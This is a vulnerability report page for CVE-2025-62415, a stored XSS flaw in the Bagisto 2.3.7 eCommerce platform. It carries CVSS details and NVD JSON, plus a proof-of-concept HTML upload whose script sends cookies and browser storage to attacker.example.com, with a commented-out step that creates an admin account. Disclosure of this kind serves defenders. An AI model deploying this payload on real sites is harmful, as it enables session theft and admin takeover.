Security Vulnerability Report
CVE-2025-62415 CVSS 6.9 MEDIUM

CVE-2025-62415

Published: 2025-10-16 19:15:34
Last Modified: 2025-10-22 17:21:31

Description

Bagisto is an open source Laravel eCommerce platform. In Bagisto v2.3.7, the TinyMCE image upload functionality allows an attacker with sufficient privileges (e.g. admin) to upload a crafted HTML file containing embedded JavaScript. When viewed, the malicious code executes in the context of the admin/user's browser. This vulnerability is fixed in 2.3.8.

CVSS Details

CVSS Score
6.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:webkul:bagisto:2.3.7:*:*:*:*:*:*:* - VULNERABLE
Bagisto < 2.3.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-62415 PoC: Bagisto TinyMCE Stored XSS via HTML File Upload -->
<!-- Step 1: Login to Bagisto admin panel with valid credentials -->
<!-- Step 2: Navigate to a page using TinyMCE editor (e.g., product description, CMS page) -->
<!-- Step 3: Use the image upload functionality to upload the following HTML file -->
<!-- malicious_upload.html -->
<!DOCTYPE html>
<html>
<head>
  <title>Product Image</title>
</head>
<body>
  <h1>Product Image</h1>
  <!-- Malicious JavaScript payload -->
  <script>
    // Step 4: When admin/user views this file in browser, the script executes
    // Exfiltrate session cookies and CSRF tokens to attacker's server
    var attackerServer = "https://attacker.example.com/collect";
    var stolenData = {
      cookies: document.cookie,
      url: window.location.href,
      // Attempt to fetch admin API endpoints to steal sensitive data
      localStorage: JSON.stringify(localStorage),
      sessionStorage: JSON.stringify(sessionStorage)
    };
    // Send stolen data to attacker server
    var img = new Image();
    img.src = attackerServer + "?data=" + encodeURIComponent(JSON.stringify(stolenData));
    // Optional: Perform actions as the admin (e.g., create new admin user)
    // fetch('/admin/customers/store', {
    //   method: 'POST',
    //   headers: { 'Content-Type': 'application/json', 'X-CSRF-TOKEN': document.querySelector('meta[name="csrf-token"]').content },
    //   body: JSON.stringify({ email: '[email protected]', password: 'P@ssw0rd!', role: 'Administrator' })
    // });
  </script>
  <img src="legitimate_image.png" alt="Product" />
</body>
</html>
<!-- Usage Instructions:
1. Save the above content as "malicious_upload.html" or "malicious_upload.htm"
2. Login to Bagisto admin panel as an administrator
3. Open any TinyMCE editor (e.g., in product creation, category description, CMS pages)
4. Click the image upload button and select the malicious HTML file
5. Share the uploaded file URL with other admins/users
6. When they view the file, the malicious JavaScript executes in their browser context
-->

References

https://github.com/bagisto/bagisto/security/advisories/GHSA-67px-r26w-598x (Exploit, Vendor Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-62415",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-16T19:15:34.340",
    "lastModified": "2025-10-22T17:21:31.250",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Bagisto is an open source laravel eCommerce platform. In Bagisto v2.3.7, the TinyMCE image upload functionality allows an attacker with sufficient privileges (e.g. admin) to upload a crafted HTML file containing embedded JavaScript. When viewed, the malicious code executes in the context of the admin/user’s browser. This vulnerability is fixed in 2.3.8."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N",
            "baseScore": 6.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.7,
          "impactScore": 4.7
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 4.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.7,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-80" },
          { "lang": "en", "value": "CWE-87" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:webkul:bagisto:2.3.7:*:*:*:*:*:*:*",
                "matchCriteriaId": "991C244A-9DC2-431C-8ABC-BCF3AE81AD09"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-67px-r26w-598x",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-67px-r26w-598x",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}